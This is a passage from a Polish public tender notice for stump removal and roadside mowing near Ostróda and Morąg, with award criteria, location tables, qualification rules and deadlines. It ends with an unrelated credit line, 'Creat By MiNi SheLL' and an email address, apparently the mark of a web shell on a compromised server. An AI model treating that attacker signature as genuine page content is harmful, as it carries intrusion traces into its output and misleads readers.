Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i będzie stanowić końcową ocenę oferty. Punkty w każdym z kryteriów będą wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>2. Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) czas wykonania jednorazowego koszenia przekazanego zakresu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część Nr 3: „Usunięcie karp teren działania Obwodu Drogowego Nr 1 w Ostródzie i Obwodu Drogowego Nr 2 w Morągu”<br/>1. Zakres zamówienia, wymagania Zamawiającego i sposób wykonania prac: <br/>Usunięcie karp:<br/>1) Przed przystąpieniem do prac, należy oznakować i zabezpieczyć miejsce prowadzonych robót zgodnie z zatwierdzonym schematem tymczasowej organizacji ruchu drogowego,<br/>2) Odpady po usunięciu karp Wykonawca zutylizuje na własny koszt.<br/>3) Uprzątnąć teren po wykonywanych pracach.<br/>4) Odpowiedzialnym za bezpieczeństwo ruchu drogowego i pieszego na odcinku prowadzonych robót jest Wykonawca,<br/>5) Miejsce po usuniętej karpie uzupełnić mieszanką 0-31,5 i zagęszczać warstwami max. 20 cm, wyprofilować pobocze oraz rów przydrożny.<br/>Lokalizacje i ilości karp do usunięcia zawierają tabele nr 4 i 5.<br/>Prace należy wykonać w ciągu 15-25 dni roboczych (kryterium oceny ofert) od podpisania umowy.<br/><br/>Tabela nr 4<br/>Lp.	numer drogi	przebieg	lokalizacja karpy	ilość<br/>1	1230 N	Warlity Ostróda-Lubajny-St. Jabłonki – Mańki km 2+710 strona prawa	1<br/>2	1230 N	Warlity Ostróda-Lubajny-St. Jabłonki – Mańki km 11+980 strona prawa	1<br/>3	1237 N	Ostróda – Brzydowo km 0+220 strona lewa	1<br/>4	1237 N	Ostróda – Brzydowo km 0+670 strona prawa	1<br/>5	1237 N	Ostróda – Brzydowo km 1+140 strona lewa	1<br/>6	1237 N	Ostróda – Brzydowo km 1+710 strona prawa	1<br/>7	1237 N	Ostróda – Brzydowo km 2+470 strona lewa	1<br/>8	1963 N	dr. nr 1232 N-Dziadyk-Ryn-Glądy km 0+120 strona prawa	1<br/>9	1219 N	Bramka - Tarda - Miłomłyn -Samborowo	km 14+320 strona lewa	1<br/>10	1219 N	Bramka - Tarda - Miłomłyn -Samborowo	km 16+120 strona lewa	1<br/>11	1219 N	Bramka - Tarda - Miłomłyn -Samborowo	km 28+960 strona prawa	1<br/>12	1219 N	Bramka - Tarda - Miłomłyn -Samborowo	km 30+410 strona prawa	1<br/>13	1188 N	Kupin - Wólka Majdańska	km 14+370 strona lewa	1<br/>14	1957 N	Dr W 537 - Jagodziny - Lewałd Wlk km 0+090 strona lewa	1<br/>15	3012 N	Ostróda - Rychnowo	km 9+580 strona prawa	1<br/>16	3012 N	Ostróda - Rychnowo	km 9+850 strona prawa	1<br/>17	3012 N	Ostróda - Rychnowo	km 10+280 strona prawa	1<br/>18	3012 N	Ostróda - Rychnowo	km 11+060 strona prawa	1<br/>19	3012 N	Ostróda - Rychnowo	km 12+820 strona prawa	1<br/>20	3012 N	Ostróda - Rychnowo	km 13+710 strona prawa	1<br/> Razem	20<br/><br/>Tabela Nr 5<br/>Lp.	numer drogi	przebieg	lokalizacja karpy	ilość<br/>1	1179N	Drulity - Marzewo - Sambród – Małdyty km 6+306 strona lewa	1<br/>2	1182N	Połowite – Gumniska Wlk. km 5+860 strona lewa	km 5+860 strona lewa	1<br/>3	1182N	Połowite – Gumniska Wlk. km 5+860 strona lewa	km 0+611 strona lewa	1<br/>4	1928N	dr W526 - Połowite - Jarnołtowo - Zajezierze 0+400 strona prawa	1<br/>5	1928N	dr W526 - Połowite - Jarnołtowo - Zajezierze - km 4+556 strona prawa	1<br/>6	1928N	dr W526 - Połowite - Jarnołtowo - Zajezierze 4+286 strona lewa	1<br/>7	1928N	dr W526 - Połowite - Jarnołtowo - Zajezierze Km 4+411 strona lewa	1<br/>8	1928N	dr W526 - Połowite - Jarnołtowo - Zajezierze km 6+278 strona lewa	1<br/>9	1209N	Jarnołtowo-Mazanki km 0+389 strona prawa	1<br/>10	1209N	Jarnołtowo-Mazanki km 0+358 strona prawa	1<br/>11	1209N	Jarnołtowo-Mazanki km 0+821 strona prawa	1<br/>12	1209N	Jarnołtowo-Mazanki km 0+836 strona prawa	1<br/>13	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 7+594 strona lewa	1<br/>14	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 9+221 strona prawa	1<br/>15	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 9+115 strona lewa	1<br/>16	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 8+929 strona prawa	1<br/>17	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 9+835 strona lewa	1<br/>18	1183N	Godkowo - Strużyna - Niebrzydowo Wlk - dr P 1180N km 16+178 strona lewa	1<br/>19	1217N	Morąg – Bożęcin km 3+603 strona lewa	1<br/>20	1217N	Morąg – Bożęcin – km 5+619 strona prawa	1<br/>21	1186N	Wilamowo-Słonecznik – Prośno km 8+837 strona lewa	1<br/>22	1186N	Wilamowo-Słonecznik – Prośno km 8+410 strona lewa	1<br/>23	1203N	Wilnowo - Mostkowo - Jonkowo – Gutkowo km 0+811 strona prawa	1<br/>24	1203N	Wilnowo - Mostkowo - Jonkowo – Gutkowo – km 1+775 strona lewa	1<br/>25	1215N	Morąg – Wola Kudypska km 4+592 strona lewa	1<br/>26	1215N	Morąg – Wola Kudypska km 1+805 strona prawa	1<br/>27	1199N	Pieszkowo-Boguchwały – Zawroty km 0+640 strona prawa	1<br/>28	1199N	Pieszkowo-Boguchwały – Zawroty km 0+560 strona lewa	1<br/>29	1199N	Pieszkowo-Boguchwały – Zawroty km 3+646 strona prawa	1<br/>30	1401N	dr W593 - Raciszewo - Kalisty – Gołogóra km 0+990 strona lewa	1<br/>31	1401N	dr W593 - Raciszewo - Kalisty – Gołogóra km 0+610 strona lewa	1<br/>32	1160N	Łępno-Podągi-dr W 528 km 9+280 strona lewa	1<br/>33	1211N	Sambród – Morąg km 5+575 strona prawa	1<br/>34	1211N	Sambród – Morąg km 5+755 strona lewa	1<br/>35	1211N	Sambród – Morąg km 12+802 strona prawa	1<br/>36	1164N	Ząbrowiec - Lesiska - Miejski Dwór ( dr. P 1162N) km 8+545 strona lewa	1<br/>37	1193N	dr P 1162N- Warkałki - dr W 528	km 4+905 strona prawa	1<br/>38	1193N	dr P 1162N- Warkałki - dr W 529	km 5+745 strona lewa	1<br/> Razem	38 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">25 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą, w każdej części odrębnie zostanie uznana oferta, która uzyska<br/>największą łączną ilość punktów. Ilość punktów za poszczególne kryteria zostanie zsumowana i<br/>będzie stanowić końcową ocenę oferty. Punkty w każdym z kryteriów będą wyliczone z<br/>dokładnością do dwóch miejsc po przecinku.2. Ocenie będą podlegać wyłącznie oferty nie<br/>podlegające odrzuceniu.3. Oferty oceniane będą przez komisję przetargową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) czas wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają warunki udziału w postępowaniu, dotyczące 4)	zdolności technicznej lub zawodowej. Określenie warunków: Wykonawca spełni warunek, jeżeli wykaże, że w trakcie realizacji przedmiotu zamówienia będzie dysponował potencjałem technicznym, tj.<br/>Dla Części Nr 1: kosiarka samojezdna – min. 1 szt., kosiarka mechaniczna do koszenia trawy – min. 2 szt., wykaszarka (spalinowa kosa mechaniczna) – min. szt. 3;<br/>Dla Części Nr 2: kosiarka samojezdna – min. 1 szt., kosiarka mechaniczna do koszenia trawy – min. 1 szt., wykaszarka (spalinowa kosa mechaniczna) – min. szt. 2;<br/>Informacje dodatkowe:<br/>Ocena spełniania warunku nastąpi na podstawie złożonego w ofercie oświadczenia, o którym mowa w § 20 ust. 1 pkt 3 SWZ (wzór – załącznik Nr 2 do SWZ). Następnie na podstawie dokumentu, o którym mowa w § 20 ust. 2 pkt 2 SWZ, złożonego na wezwanie Zamawiającego przez Wykonawcę, którego oferta została najwyżej oceniona (wzór – załącznik Nr 3 do SWZ). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenia wykonawcy, w zakresie § 14 ust. 1 pkt 5 SWZ, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz.U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;<br/>b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie § 14 ust. 2 pkt 1 SWZ, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>-	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w § 20 ust. 2 pkt 1 lit. b SWZ- składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>-	Dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>-	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w tiret pierwsze, zastępuje się je w całości dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Przepis tiret drugie stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami (wzór wykazu – Załącznik nr 3 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykaz oświadczeń i dokumentów składających się na ofertę:<br/>1) formularz ofertowy zgodny z treścią załącznika nr 1 do SWZ;<br/>2) odpowiedni formularz cenowy (odpowiednio załącznik nr 1a, 1b lub 1c do SWZ)<br/>3) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SWZ), w zakresie wskazanym przez Zamawiającego.<br/>a) Oświadczenie, o którym mowa w pkt 3, stanowią wstępne potwierdzenie braku podstaw wykluczenia, spełniania warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>b) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 3, składa każdy z wykonawców we własnym imieniu. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>c) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 3, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>4) jeżeli wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>5) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru- w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania;<br/>a) wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 5, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>6) Pełnomocnictwo (wzór stanowi załącznik nr 6 do SWZ) lub inny dokument potwierdzający umocowanie do reprezentowania:<br/>a) jeżeli w imieniu: wykonawcy / wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego / podmiotu udostępniającego zasoby na zasadach określonych w art. 118 uPzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na zasadach określonych w art. 118 uPzp, działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 5;<br/>b) w przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców. <br/>7) w przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców- oświadczenie, z którego wynika, które usługi wykonują poszczególni wykonawcy (wzór oświadczenia w załączniku nr 2 do SWZ, w części dotyczącej wykonawcy wspólnie ubiegającego się o udzielenie zamówienia). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Na podstawie art. 58 ust. 5 uPzp przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających o udzielenie zamówienia. Pozostałe wymagania dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia zostały określone w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/proceeding/preview/584220</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-18 09:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia.<br/>Część 3: 15- 25 dni (kryterium oceny ofert).

Creat By MiNi SheLL
Email: jattceo@gmail.com